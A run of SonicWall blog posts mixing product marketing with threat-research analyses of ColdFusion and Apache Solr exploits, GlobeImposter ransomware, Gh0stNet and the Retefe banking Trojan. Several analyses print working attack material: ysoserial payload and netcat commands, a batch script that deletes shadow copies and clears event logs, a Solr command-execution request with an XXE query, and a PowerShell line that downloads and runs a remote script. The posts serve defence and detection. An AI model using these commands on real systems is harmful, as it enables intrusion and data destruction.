SonicWall and our Channel Partners Team to Deliver New High-Value Security Professional Services to Fight the Bad Guys

/0 Comments/in , /by

I can only imagine the pressure that comes with the job of being responsible for a company’s network security.  These individuals are not only entrusted with protecting company and customer data, but the reputation of the company and its brand.  In the case of smaller businesses, the stakes are particularly high, where a network breach and data loss can threaten the very existence of the company. According to the Ponemon Institute Cost of a Data Breach 2017, the average cost of a breach for the average total cost of a data breach is $3.62M, and over 60 percent of SMBs cease to exist 6 months following a data security breach. Add to these grim statistics the incredible rise in malware, ransomware and other advanced threats in a constantly evolving cyber threat landscape and you have the plot of a very scary true (cyber) crime movie – the good guys vs. the bad guys.

Network security vendors like SonicWall and the channel partners who integrate our products in to security solutions for their customers are most often the first line of defense to help organizations defend against the bad guys. These organizations rely on SonicWall to deliver highly efficient security products that can stop today’s known and unknown threats. And they rely on our channel partners as their trusted advisors to deliver their security solution. With so much at stake, it is critical that the right SonicWall products are designed in the security solution. And just as critical that the solution is implemented properly and optimized for the customer’s environment and business requirements. Even the best security products, if not properly spec’d and implemented, can leave an organization vulnerable. To address this reality, SonicWall has announced the launch of a new lineup of valuable professional security services to help customers and channels design, implement and operate SonicWall security solutions that keep the bad guys at bay and defend against their relentless cyber attacks.

Organized around three areas of competency, the security professional service offerings were jointly developed and blueprinted by SonicWall and a group of channel partners (the good guys) with deep security services expertise. Each service incorporates the real-world services experience of these partners, essential knowledge gained through hundreds of services engagements.

The services include:

  • Implementation Services – compliance audit prep, remote and onsite implementation services for SonicWall products
  • Solution Services – security health checks,  wireless security deployments, campus network and distributed network solutions.
  • Architecture Services – more complex or large-scale solutions and customer environments, such as DPI-SSL deployment or SuperMassive next-gen firewall implementations.

It makes so much sense to have these types of services surround the SonicWall product portfolio, as a means to ensure our customer have the best possible protection. As SonicWall’s Channel Chief, I’m equally proud of the new services as I am of the way in which they are delivered.

This is where our new Partner Enabled Services Program comes in. Just launched, the program identifies and showcases SonicWall SecureFirst channel partners who have a security focused professional services practice and enables them to deliver the new services. These partners are vetted, granted status as a SonicWall Advanced Authorized Services Partner and given access to exclusive training, tools, sales, marketing and technical resources. All of the services are branded and sku’d by SonicWall, so the entire SonicWall channel can resell them. Once sold, the services are delivered by the Advanced Services Partners.

This breakthrough approach to delivering professional security services is only possible due to the collaboration and trust that exists within the incredible SonicWall channel partner ecosystem – one that has developed over the last 25 years. SonicWall channel partners genuinely trust each other to engage respectfully with their customers to deliver high-grade professional security services and, in doing so, they deliver the most effective security solution and drive incremental opportunity for their business. With this program, SonicWall’s broad channel, our Authorized Services Partners, and most importantly, our customers, can join forces to fight the bad guys and win the war against cyber attacks. Score one for the good guys!

Feedback from our channel on this approach to services offer creation and delivery has been fantastic.

“This year marks 20 years of our relationship with SonicWall and we are excited about deepening our engagement with SonicWall and showcasing our SonicWall based services expertise through the Partner Enabled Services Program. The Exertis team is highly skilled in SonicWall distributed architecture deployments, proven time and again to be the real leader when customer security is at stake,” Jason Hill, Security Sales Director of Exertis in United Kingdom, a leading SonicWall distributor in Europe..

“As a dedicated SonicWall Platinum Partner with a mature services practice, we are delighted to see SonicWall making such significant investments in driving partner growth in security services.  Our team of security experts have a passion for security and phenomenal service,” said Timothy Martinez, President of Western NRG Total Internet Security, based in Camarillo California. “With more than 15 years of SonicWall implementations, we go to battle for our customers in the cyber arms race. The Partner Enabled Services Program is an excellent opportunity to grow our services further with SonicWall.”

“Our unwavering commitment is to protect and empower our customers against today’s most damaging cyber attacks,” said Michael Crean, CEO of Solutions Granted, a SonicWall SecureFirst Platinum partner in Virginia. “In our case, as one of SonicWall’s longest-term Managed Security Services Providers, this requires additional services and expertise to ensure we’re delivering the value and guidance our customers require to be secure. SonicWall understands our needs and, yet again, delivers the structure, resources, training and incentives to enhance customer loyalty, satisfaction and market recognition.”

Customers interested in the new security professional services should contact their SonicWall channel partner.  For interested SecureFirst Partners, we have a webinar planned for Nov. 30 at 8:30 am PT: Grow your Services Business with the New Partner Enabled Services Program.

VISIT PARTNER PORTAL

Blackfriday brings malicious apps to the Android ecosystem

/in /by

The month of November brings a lot of shopping deals thanks to Black Friday. The deals and discounts are in abundance online as well as in stores. However these days there is an app for everything, shopping is not far behind as there are apps from all major online retailers. Moreover there are specific apps that showcase the best deals from all around the marketplace.

The month of November sees a spike in installation of such shopping apps, naturally this is a good opportunity for malware writers to spread their malicious apps. We will try to document our findings for the year of 2017 with regards to Black Friday:

DroidJack

One of the first apps we observed was being distributed was DroidJack with the name amazon. We have covered DroidJack in the past where it masqueraded different apps here and here.

Clearly the internal structure remains the same, however the malware writers are using BlackFriday as a means to spread their apps. A point to note though, the current app only uses the name of amazon and nothing else. No efforts were made towards copying the icon.

It is interesting to note that the author of this app has been creating malicious apps with DroidJack components in them, just around the shopping season the author created a DroidJack infested app with the name amazon.

We will continue to update this blog with new findings as the Thanksgiving season reaches its peak.

Sonicwall Capture Labs provides protection against this threat via the following signature:

  • GAV: AndroidOS.DroidJack.MA_2 (Trojan)

Sample analyzed:

  • App name: amazon
  • Package name: net.droidjack.server
  • MD5: bc66d909ea906dc5933e7dacd6a461d1

 

Adobe ColdFusion RMI Registry Insecure Deserialization Vulnerability

/in /by

Adobe ColdFusion is a popular application development platform. A vulnerability CVE-2017-11284 has been reported in Adobe ColdFusion. Due to the lack of input validation on objects in the RMI Registry before deserialization, an attacker could execute arbitrary commands under the root privilege. The Adobe Systems ColdFusion 11 prior to update 13, and Adobe Systems ColdFusion 2016 release prior to update 5 are affected by this vulnerability.

Java supports a feature called serialization, which allows Java objects to be packed into a byte stream, and be deserializing by another Java application (such as applet). The methods of readObject() and writeObject() from Serializable interface are used for serializing and deserializing.

The Java Remote Method Invocation (RMI) is a service that supports the cross-JVM method calls. It by default listens on port 1099. When the serialized data are received in the request for the RMI service of Adobe ColdFusion, an attacker could include malicious data to call an exploitable library in the code path, triggering a remote code execution vulnerability.

To exploit this vulnerability, a payload of malicious serialized object is needed. There is an open-souced Proof-of-Concept tool called “ysoserial”, which can generate such payloads, lowered the bar for an exploit:

 $ java -jar ysoserial.jar CommonsCollections1 calc.exe | xxd 0000000: aced 0005 7372 0032 7375 6e2e 7265 666c  ....sr.2sun.refl 0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41  ect.annotation.A 0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174  nnotationInvocat ... 0000550: 7672 0012 6a61 7661 2e6c 616e 672e 4f76  vr..java.lang.Ov 0000560: 6572 7269 6465 0000 0000 0000 0000 0000  erride.......... 0000570: 0078 7071 007e 003a                      .xpq.~.:   $ java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin $ nc 10.10.10.10 1099 < groovypayload.bin  $ java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe

SonicWall has developed the following signature to identify and stop the attacks:

  • IPS 13048: Adobe ColdFusion RMI Registry Insecure Deserialization

GlobeImposter Ransomware renders system unbootable

/in /by

The SonicWall Capture Labs Threat Research Team have come across ransomware that goes by the name GlobeImposter. It is also known as Fake Globe. GlobeImposter is distributed via a malicious spam campaign and as with all ransomware encrypts the victims files making them irrevocable without payment. Most ransomware have a built in file extension filter that will leave executable files intact. This ransomware however, encrypts executable files and renders the system unbootable as a result.

Infection Cycle:

Upon execution the Trojan makes the following changes to the filesystem and begins its file encryption process:

  • copies itself to %APPDATA%{original_filename}.exe [Detected as GAV: GlobeImposter.A (Trojan)]
  • creates %ALLUSERSPROFILE%60091F9FF415A9DD5FDFF0D880249E69F883A75D0242CE20D6E6A90CC5AEAFDE
  • encrypts files and gives them a .TRUE file extension
  • drops how_to_back_files.html into every directory containing encryped files

how_to_back_files.html contains the following html page:

The page contains data on steps needed to recover files. We wrote to true_offensive@aol.com and received the following reply:

If %ALLUSERSPROFILE%60091F9FF415A9DD5FDFF0D880249E69F883A75D0242CE20D6E6A90CC5AEAFDE already exists, the trojan ceases all operations and exits.

60091F9FF415A9DD5FDFF0D880249E69F883A75D0242CE20D6E6A90CC5AEAFDE contains the following data:

After encrypting files (including .exe files), the Trojan then performs operations to make file restoration difficult. It even clears Windows event logs and removes any saved remote desktop configurations. The following .bat file performs this task before being deleted.

@echo offvssadmin.exe Delete Shadows /All /Quietreg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /freg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /freg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"cd %userprofile%documentsattrib Default.rdp -s -hdel Default.rdp for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"

Since the Trojan encrypts critical system files, it renders the machine unbootable:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

  • GAV: Globeimposter.RSM (Trojan)
  • GAV: Globeimposter.RSM_2 (Trojan)
  • GAV: Globeimposter.RSM_3 (Trojan)
  • GAV: Globeimposter.RSM_4 (Trojan)

SonicWall First to Identify 73 Percent of New Malware with Capture ATP Sandbox

/0 Comments/in /by

Last month, I wrote how we found nearly 26,500 new forms of malware and shared some general stats.  Let’s take a look at the new threats found by SonicWall’s network sandbox, Capture Advanced Threat Protection (ATP).

While the general number of new threats dropped, there were some interesting figures and trends to point out.

Of the 16,115 new forms of malware and zero-day attacks:

  • Only 4,321 were known by one other security firm (that we partner with), just moments before us
  • This means over 73 percent (11,794) were never seen until SonicWall identified them

This is very encouraging because it demonstrates three important points:

  1. The SonicWall customer base of Capture ATP subscribers are protecting each other by serving up samples before researchers can find them
  2. The technology is working wonderfully
  3. The month-over-month data proves that SonicWall is your best defense against new threats

Interestingly, last year at this time, I was finding a lot of ransomware versions by the big boys, such as Locky & Cerber. Now we are seeing attacks from copycat malware authors who conduct smaller attacks. The overall numbers are down, but the number of cybercriminals involved are up. As a result, a lot of ransomware attacks may fly under the radar.

Plus, this is what is now hitting the radar: credware.

What is Credware?

Credware is a term for a type of malware that is designed to steal credentials — and I’m finding a lot of credware every day, in many formats. I see new forms of spyware and a lot of Trojans that are going after all of those saved passwords in browsers. Since Chrome is harder to attack, hackers are targeting saved passwords in Firefox, Safari, Opera, Internet Explorer, and Edge. (See below).

Infected Documents

Hackers are adding their new versions of malware inside of document, such as Microsoft Word and PDFs. On a typical day, I saw that roughly 3-6 percent of new malware samples are found in these file types, but I have noticed a large increase as the days progressed.

Some days, as much as 39.3 percent of malware is found in digital documents, mostly Office files. Even if I set a high baseline of 5 percent, you can see how some days have an alarming rate of malicious documents (See below).

What is also surprising about this data is that you would expect a lot of this to be found in email traffic. Although most of it was, a lot of it was not, especially PDFs. In fact, on Sept. 26, 82 percent of malicious PDFs were found online by protected customers.

This data comes on the heels of SonicWall improving its backend performance for how quickly we can examine and return a verdict for PDFs. As we look back at the data, I’m happy to announce that the median time to process a file is around one second, and 71.3 percent of all files in September were processed with a verdict in under five seconds.

If you’d like more information on how you can add Capture ATP to protect your network and network based endpoints read: Executive Brief: Why network sandboxing is required to stop ransomware.

View Executive Brief

California School District Amps Up Content Filtering with SonicWall’s Security-as-a-Service

/0 Comments/in /by

We know how much value SonicWall network security brings to our customers, and we know how much value our partners add when incorporating our solutions into their solutions for our customers.

The case of Calistoga Unified Regional School District is an excellent example.

Calistoga is in California’s Napa Valley. The district has more than 850 students, divided among an elementary school, junior/senior high school and an alternative-program continuation high school for students between the ages of 16 and 18. Administration offices are in a separate building near the junior/senior high school.

The district felt that its existing content-filtering services were not providing all the functionality it needed. Calistoga couldn’t get the flexibility and granular control over content filtering it needed to define different roles and access permissions for students, faculty and staff.

Like all K-12 school districts, Calistoga’s content filtering is there to protect against inappropriate and malicious web content, as well as to control application access.

“Our No. 1 priority is making sure that the students are protected,” says Jenna Burrows, Calistoga’s Director of Business Services.

Regulatory requirements regarding content filtering are also part of the picture. The Children’s Internet Protection Act (CIPA), is the most directly relevant. Content filtering is also important with regards to the Family Educational Rights and Privacy Act (FERPA), which protects students’ personally identifiable information (PII) from unauthorized disclosure, and is a requirement for districts to be eligible for discounts through the federal E-rate program.

Faced with a clear need to upgrade their content-filtering capabilities, Calistoga turned to their local managed services provider, Napa Valley Networks (NVN). NVN has been a SonicWall partner for more than 15 years. NVN recommended SonicWall’s Content Filtering Service for Calistoga.

But NVN didn’t stop with content filtering. After an initial audit of Calistoga’s network, they uncovered an issue with the district’s gateway. NVN’s Vice President and Chief Technology Officer, Kyle Lumley, says the existing gateway “didn’t give them the control or feature set that they needed.”

NVN’s recommendation for Calistoga was a SonicWall SuperMassive 9800 next-generation firewall with High Availability capability.

All well and good so far. More granular, customizable content filtering and a new gateway to provide better control for the present, as well as being better able to handle future increases in networked devices and utilization.

Then came the 400-pound gorilla. How could Calistoga afford to pay for these improved capabilities? School districts work under very tight financial constraints.

Fortunately, NVN and SonicWall had a solution.

Calistoga leveraged SonicWall’s Security-as-a-Service (SECaaS). Rather than paying a large amount upfront as a capital expenditure, Calistoga pays a much more manageable monthly fee which fits within its operating budget. Burrows says this is a much more reasonable solution for the district.

Additionally, much of the cost is eligible for discounts through the federal E-rate program.

NVN coordinated the transition to the new gateway and Content Filtering Service. All went well, even in the face of tight deadlines. Calistoga’s happy with the results.

Read the Case Study here.

Read Calistoga Case Study

Gh0stnet now spreads as a fileless malware

/in /by

The SonicWall Capture Labs Threat Research team recently observed a new version of Gh0stNet backdoor spreading with the file less technique, which is using PowerShell script for initial execution. This version of Gh0stNet is using new commands for communication.

Infection Cycle:

Upon execution the script spawns powershell.exe to perform malicious activities.

Fig1. Trojan uses owershell.exe to download and register itself as a startup item

Figure 1 shows the script will download a Base64 encoded data from a pastebin.com address. It then decodes and unzips the data to get the next level PowerShell script. The second stage PowerShell script is shown in the figure below:

Fig2. Base64 Encoded shellcode

After decoding the Base64 encoded shellcode, it calls “Inject-LocalShellcode” function to inject shellcode into the running instance of PowerShell as shown in the figure below:

Fig3. Powershell Shellcode injection

The injected shellcode contains code to unpack the embedded UPX packed file (without headers) and execute the unpacked code. Figure 4 below shows the UPX packed file that is present in the injected shellcode.

Fig4. Embedded UPX packed file

When the UPX unpacked code executes, it first decodes the Config string using a custom Base64 decoding key as shown below:

Fig5. Decrypting the config URL using a custom key

Visiting the URL shows a seemingly encoded information.

Fig6. Some encoded data shown on the page of the decoded URL

Figure 7 below shows that the malware searches for the marker “x=” in the response received from the URL post request. Once the marker is found, it decodes the string followed by marker to get the second stage Command and control server.

Fig7. Decoded response from the URL

After this the backdoor starts the communication with the command and control server by sending the following request:

Fig8.Scote_connection|hwid = [customid _from_created_cpuid]

It then creates a thread that will listen on the incoming commands from the command and control server.

The following are the commands sent from the remote server:

  • scote_info_ipconfig
  • scote_info_systeminfo
  • scote_drop
  • scote_upgrade
  • scote_upgrade_internal

Below are the functionality details for each command:

  • scote_info_ipconfig:

    • In response to this command the backdoor will collect the IP configuration information by executing “cmd.exe /C ipconfig” command. It will then encrypt it with using a Base64 custom key and send it to the C&C server using the format: “command=scote_info_ipconfig|buffer=[Encrypted IP Config].”
    The figure below shows that response packet.

    Fig9.Sample response to scote_info_ipconfig command

  • scote_info_systeminfo:

    • In response to this command the backdoor will collect the system information by excuting “cmd.exe /C systeminfo” command. It will then encrypt it with using a Base64 custom key and send it to the C&C server using the format: “command=scote_info_systeminfo|buffer=[Encrypted System Info].”

    The figure below shows that response packet:

    Fig10.Sample response to scote_info_systeminfo command

  • scote_drop

    • The backdoor will terminate after receiving this command.

  • scote_upgrade

    • After receiving this command the backdoor will inject the code in “svchost.exe” and “explorer.exe” and will terminate itself. Before code injection, the backdoor installs a hook for “ntdll. ZwDelayExecution” to evade analysis and perform code injection through the hooked function as shown below:

    Fig11.Code injection through another hooked function

SonicWALL Capture Labs provides protection against this threat with the following signature:

  • GAV: Ghostnet.A (Trojan)

Apache Solr Remote Code Execution Vulnerability

/in /by

Apache Solr is an open source distributed search platform built on the Apache Lucene search engine library. A remote code execution vulnerability has been reported on Apache Solr before version 7.1, which allows an attacker to send certain crafted HTTP requests to execute artitrary commands on a remote server.

The code execution vulnerability

Solr uses the term “collection” to define a single search index, which is effectively a logical grouping of index data. Search queries are typically sent to Apache Solr by sending requests to the following URI: 

http://:8983/solr//select?q=

where is the collection name to perform the query on, and is a query using any supported query syntax. Such request is sent via HTTP POST request, and will be handled by Apache Lucene parser.

Solr supports the use of event listeners which can be used to trigger actions based on various events sent to the collection (e.g. Update an collection). Event listeners require an event type as well as a handler class. Handler classes may be either a custom class or a built in class. Solr “RunExecutableListener” class can be used to execute arbitrary commands on specific events, for example after each update query. The problem is that such listener can be enabled with any parameters just by using Config API (http://:8983/solr//config) with add-listener command:

 POST /solr/newcollection/config HTTP/1.1 Host: localhost:8983 Connection: close Content-Type: application/json Content-Length: 198  "add-listener" : { "event":"postCommit", "name":"somelistener", "class":"solr.RunExecutableListener", "exe":"[command]", <--- Arbitrary command "dir":"solr/bin", <--- Command path "args":["foo","bar"] <--- Command params } }

When the postCommit event is triggered, the remote command will be executed on the privilege of the Solr server process.

The above mentioned vulnerability is sufficient for a local privilege escalation attack. To exploit this vulnerability without direct access to the Solr server, there is another vulnerability that can be exploited in a chained attack - The XML external entity expansion vulnerability.

The XML external entity expansion vulnerability

This vulnerability is caused by the lucene xml parser does not prohibit DOCTYPE declarations or the expansion of external entities. A query can be crafted that can cause Solr to make requests via localhost when it attempts to resolve an external entity, resulting in a server-side request forgery.

For example, when the request handled by the Apache Solr, a HTTP GET request to evilurl.com will be made.

http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v=''}

Combined with this vulnerability, the attacker could send local requests to the server, turning a local code execution vulnerability to a remote RCE vulnerability.

An exploit is already in the wild on exploit-db. A real world attack consists 3 parts:

  1. Create a new collection to prepare the URL for the local code execution, using the second vulnerability to call the localhost service URL. (If a collection name is known to the attacker, this step can be skipped)
  2. Trigger the code execution vulnerability, using the collection name created in step 1.

    3. http://localhost:8983/solr//select?q=foo&qt=/solr/newcollection/config?stream.body=&shards=localhost:8983/

  3. Update "newcollection" through XXE to trigger execution of RunExecutableListener. Using the same format of request from step 3.
  4. The malicious command contained in step 2's JSON payload will be executed.

SonicWall threat Research team has analyzed the vulnerability and developed the following signatures:

  • IPS 13036: Apache Solr Remote Code Execution 1
  • IPS 13037: Apache Solr Remote Code Execution 2

Move to the Cloud and Enable Secure Collaboration with SonicWall SMA OS 12.1

/0 Comments/in , /by

Moving to the cloud and enabling mobility are top IT priorities for organizations of all sizes. Today, most business have adopted a hybrid IT model, which includes legacy on-premise applications in local data centers and popular SaaS applications hosted in the cloud.

Securing this hybrid IT environment, while providing a consistent experience — with anytime, any device, any application access to authenticated users — remains a key challenge for the IT department.

Keeping those priorities in mind, SonicWall today launched the new OS 12.1 for its Secure Mobile Access (SMA) appliances.

Move to the Cloud

For organizations embarking on a cloud migration journey, SMA offers a single sign-on (SSO) infrastructure that uses a single web portal to authenticate users in a hybrid IT environment. Whether the corporate resource is on-prem, on the web or hosted in the cloud, the access experience is consistent and seamless. SMA also integrates with industry-leading multi-factor authentication technologies for added security.

Mobility and BYOD

For organizations wishing to embrace BYOD, flexible working or third-party access, SMA becomes the critical enforcement point across them all. SMA delivers best-in-class security to minimize surface threats, while making organizations more secure by supporting the latest encryption algorithms and ciphers.

SonicWall SMA allows administrators to provision secure mobile access and role-based privileges so end-users get fast, simple access to the business applications, data and resources they require. At the same time, organizations can institute secure BYOD policies to protect their corporate networks and data from rogue access and malware.

Managed Service Providers

For managed service providers or organizations hosting their own infrastructure, SMA provides turnkey solutions to deliver a high degree of business continuity and scalability. SMA can support up to 20,000 concurrent connections on a single appliance, with the ability to scale upwards of hundreds of thousands of users through intelligent clustering.

Data centers can reduce costs with active-active clustering and a built-in dynamic load balancer, which reallocates global traffic to the most optimized data center in real time based on user demand. SMA tool sets enable service providers to deliver services with zero downtime, allowing them to fulfill very aggressive SLAs.

Key New Features

The new 12.1 firmware addresses the above uses cases with the following new capabilities:

Federated Single Sign-On

SMA OS 12.1 delivers secure access from a single URL to Microsoft Office 365 and other cloud SaaS applications that use the SAML 2.0 authentication protocol. SMA fits seamlessly into an organization’s existing infrastructure and enables federated single sign-on (SSO), using a single pane-of-glass web access portal, to applications hosted in the cloud or in a local data center. A single login event (without requiring a VPN tunnel) can create a secure session for authenticated users with authenticated devices to any business application.

Read our tech brief to find how SonicWall SMA achieves identity federation for access requests initiated by both service providers and identity providers.

Secure File Share

The release innovates in the realm of access security by offering the capability to scan files uploaded by unmanaged endpoints to the corporate network. Documents uploaded using personal or BYOD devices (unmanaged endpoints) by remote workers, third-party contractors or office employees with full VPN access to corporate network, typically bypass network security and are not inspected by a firewall. SMA OS 12.1 addresses this security gap by providing a secure file share mechanism.

 

Read our tech brief to find how SonicWall SMA stops malicious files from entering your corporate network.

SMA provides a web-based HTML5 file explorer for users to upload their documents, which are scanned by the cloud-based, multi-engine Capture ATP sandbox service for ransomware, zero-day threats and unknown malware. The verdict is delivered in near real-time, and suspicious files are rejected.

Capture ATP file scan reports are available on mysonicwall.com with detailed user session information.

The central management server (CMS) for SMA provides reporting and monitoring capabilities, including Capture ATP test results and session information (such as user ID and IP address). In addition, when the solution is deployed with a SonicWall next-generation firewall, SMA shares the session information with the firewall. This enables end-to-end network visibility, and provides an audit trail for reporting and compliance.

Universal Session Persistence

An enhancement to the global high-availability feature is session persistence in the event of a failover. User session data is replicated across the mesh network of SMA appliances in an active-active global cluster. In the event of a disaster or appliance failure, service owners can now deliver zero-impact failover that provides a frictionless experience to users without the need to re-enter credentials. This feature empowers service providers to adhere to stringent Service Level Agreements (SLAs) and deliver near zero downtime service.

New Licenses

In addition to new features, SMA OS 12.1 introduces “Secure Email Access” subscription licenses. This enables organizations to implement and pay only for their specific usage scenario (e.g., email with ActiveSync or Outlook Anywhere), significantly reducing total cost of ownership for customers. These licenses are centrally managed and distributed in real time based on user demand, across global datacenters.

SonicWall SMA OS 12.1 builds upon the vision to deliver true “anytime, any device, any application” secure access to your workforce. The solution enables organizations to embrace mobility and BYOD without fear, and move to the cloud with ease.

SMA OS 12.1 is compatible with SMA appliances 6200, 7200, 8200v and EX 9000. Customers with an active support contract are eligible for a free upgrade on mysonicwall.com. Download the new SonicWall SMA 12.1 here.

VISIT MYSONICWALL.COM

New version of Retefe Banking Trojan Uses EternalBlue

/in /by

Retefe Banking Trojan first appeared in mid 2013 targeting Switzerland, Austria and Sweden and some banking sites in United Kingdom. It spread through spam campaign pretending to be from Swiss banks containing malicious RTF attachment that had embedded malicious executable either .exe file or control panel file (.cpl).

Retefe makes the following changes in a victim’s machine:

  • Changes the DNS setting to a rouge DNS server.
  • Installs Rouge CA (Certificate authority).

Changing the DNS setting now allows the victim’s online banking session to be redirected to a fake banking portal. The fake CA certificate installed is used to avoid SSL certificate errors when browsing the fake website.

In 2015, an updated Trojan was released which used Proxy auto-config (PAC) instead of a fake DNS. With this method,instead of redirecting the victim’s entire web traffic, only certain domain names configured in the PAC were redirected to the proxy server that served as the fake banking portal.

Below is the image showing the Proxy PAC configuration:

The SonicWall Capture Labs Threat Research team recently observed a new email campaign with an updated version of this threat. The updated version of Retefe malware has been observed to use the EternalBlue exploit to spread internally on the network.

The email contains a document file attachment which contains a Package Shell Object or an OLE object which in this case is a windows shortcut (.lnk) file:

The above image shows the document file delivered by email which the contains OLE object. Upon clicking on the .lnk file, it shows a warning message as shown in the above image. It subsequently runs the PowerShell command:

The target field of the OLE object contains an obfuscated PowerShell command. After de-obfuscation, we can see it downloads the payload from URL: Hxxp://ipezuela.com/fwltxgf.exe.

The downloaded executable payload file in the current campaign is a self-extracting ZIP archive that contains an obfuscated JavaScript file. This obfuscated JavaScript is the installer, below is the extracted obfuscated JavaScript file:

The de-obfuscated JavaScript:

In the above de-obfuscated JavaScript, there are several parameters in “cfg”:

  • dl:- It is a list of proxy servers that are hosted in TOR.
  • cert:- A fake root certificate encoded by Base-64.
  • ps:- Base-64-encoded PowerShell script to install certificate for Internet Explorer.
  • psf:- Base-64-encoded PowerShell script to install certificate for Firefox.
  • pstp:- Base-64-encoded PowerShell script that downloads and installs TOR.
  • pseb:- Base-64-encoded PowerShell script which contains EternalBlue exploit to spread.

The JavaScript decodes the above parameters in “cfg” one at a time. The decoded parameters are additional PowerShell scripts that perform the intended activities such as installing TOR, installing a certificate for Internet Explorer, installing a certificate for Firefox and implementing EternalBlue exploit.

First, the JavaScript installs the TOR and other utilities by running a PowerShell script:

The above Base64 encoded function translates to “cfg.pstp” parameter which then executes the script using Powershell. It first creates a random number, and uses this random number as an index to select the domain from the “cfg.dl” (TOR hosted domains), and replaces %DOMAIN% with the selected domain within the PowerShell script (in this case, cfg.pstp). It then executes the decoded script with PowerShell using the parameters: – ExecutionPolicy Unrestricted -File. The decoded PowerShell Script which downloads and installs TOR is shown below:

The above script (cfg.pstp) downloads the TOR from one of the TOR mirror sites at %appdata%Ad0be. Then it adds a scheduled task to start the TOR browser (tor.exe). The scheduled task is executed in the context of “mshta.exe”, as the actual command to be executed is wrapped inside the JavaScript.

It also downloads socat.exe and creates a scheduled task for it:

The purpose of this schedule task is to setup the TOR socks proxy where the %DOMAIN% is replaced by one of the tor sites present in the JavaScript.

The JavaScript then decodes another PowerShell script that installs the certificate for IE:

The above Base64 encoded function decodes to “cfg.ps” and replaces %CERT% in the decoded script with a fake root certificate “cfg.cert”. It then executes the PowerShell with parameters: – ExecutionPolicy Unrestricted -File

Below is the PowerShell script to the install certificate for IE:

After installing the certificate, it installs PAC (proxy-auto config) for Internet Explorer:

The following are the registry entries used to set the PAC:

  • HKCUSoftwareMicrosoftWindowsCurrentVersionInternet SettingsAutoDetect
  • HKCUSoftwareMicrosoftWindowsCurrentVersionInternet SettingsAutoConfigURL

After installing certificate and PAC for IE, JavaScript decoded PowerShell script that installs the fake certificate for Firefox and installs PAC for Firefox:

PowerShell script to install certificate for Firefox:

InstallPac() to configure PAC for Firefox and unblocking DotOnion sites:

After installing the fake certificate and configuring the PAC for both IE and Firefox, it kills the following running applications:

  • taskkill /F /im iexplore.exe
  • taskkill /F /im firefox.exe
  • taskkill /F /im chrome.exe

The JavaScript finally decodes the PowerShell script that implements EternalBlue exploit. This script also uploads the log file to the remote server over ftp. The LogWrite() function in the script writes the log into the log file, UploadLog() function uploads the log file on the remote server as shown below:

The PowerShell collects the following information from the system to upload on the server; it uses CheckInstall() function for the same:

  • Operating System information.

    • $wininfo = (Get-WmiObject Win32_OperatingSystem | Select Caption, ServicePackMajorVersion, OSArchitecture, Version, MUILanguages);

  • PowerShell version.
  • Proxy Auto Config settings from the registry key: $pac=Get-ItemProperty ‘hkcu:Software\Microsoft\Windows\CurrentVersion\Internet Settings’|Select -expand AutoConfigURL -ErrorAction Stop;
  • Installed certificate on the machine, with subject filed of the certificate:
    *COMODO RSA Extended Validation Secure Server CA 2*
  • Information about tor and socat running on the system.
  • Directory list of: %AppData
    %Ad0be
  • Information about the installed AV on the machine:
    $avlist=(Get-WmiObject -Namespace “rootSecurityCenter2” -Query “SELECT * FROM AntiVirusProduct” @psboundparameters|Select -expand DisplayName);

After collecting the above information from the machine, the script finally executes the SMB EternalBlue exploit. The PowerShell script collects all the IP addresses in the network and invokes EternalBlue as shown below:

The EternalBlue() in the script contains a “payload” variable which has encoded data. After decoding the encoded data, it is revealed to have a PowerShell command that downloads another PowerShell Script from the server as shown below:
powershell -ep Unrestricted -ec $F=$env:Temp+’\s.ps1′;(New-Object System.Net.WebClient).DownloadFile(‘http://karinart.de/css/0FgYsvuX9V445592.ps1’,$F); Start-Process “powershell” -ArgumentList “-ep Bypass -f $F” -Wait NoNewWindow

This downloaded script from the above command contains Base-64-Encoded data:

The decoded data is nothing but another executable file that drops another JavaScript which is same as the pervious one, the only difference being the new JavaScript does not have the EternalBlue script to avoid the infinite loop of EternalBlue infection:

Sonicwall Capture Labs detects this threat via the following signatures:

  • GAV: Retefe.A_3 (Trojan)
  • GAV: Retefe.B (Trojan)